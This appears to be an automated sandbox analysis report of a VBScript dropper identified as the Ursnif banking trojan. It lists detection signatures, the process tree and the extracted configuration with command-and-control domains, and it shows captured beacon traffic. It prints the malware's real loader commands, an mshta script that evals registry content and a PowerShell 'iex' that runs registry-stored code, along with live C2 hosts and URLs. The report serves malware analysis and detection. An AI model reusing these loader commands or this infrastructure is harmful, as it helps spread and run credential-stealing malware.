Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report start[526268].vbs

Overview

General Information

Sample Name:start[526268].vbs
Analysis ID:480986
MD5:b0de0a696f7b17724fef5c5e0af2bd1d
SHA1:3de72b8cae6a84f82e05cae18f48a1a302dbebc3
SHA256:e3a1fb3e932aae628aa08bde31be3b30861fa90ca16db4f81d7989093e1fddbe
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5464 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 5832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 5004 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 3128 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • WmiPrvSE.exe (PID: 5336 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 4088 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 1956 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4216 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4624 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
          00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            34.3.rundll32.exe.566a4a0.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
              34.3.rundll32.exe.5718d48.2.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                34.3.rundll32.exe.566a4a0.1.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                  34.3.rundll32.exe.5718d48.2.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                    34.3.rundll32.exe.56e94a0.3.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4216, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline', ProcessId: 4624
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132757561457280033.4216.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
                      Antivirus detection for URL or domainShow sources
                      Source: http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZuAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: atl.bigbigpoppa.comVirustotal: Detection: 8%Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,34_2_01203276
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49792 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49793 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49793 -> 185.251.90.253:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80Jump to behavior
                      Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
                      Source: Joe Sandbox ViewIP Address: 185.251.90.253 185.251.90.253
                      Source: global trafficHTTP traffic detected: GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
                      Source: global trafficHTTP traffic detected: POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Sep 2021 05:02:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: powershell.exe, 00000027.00000002.677979658.0000019D8B650000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000027.00000002.678446802.0000019D8B851000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
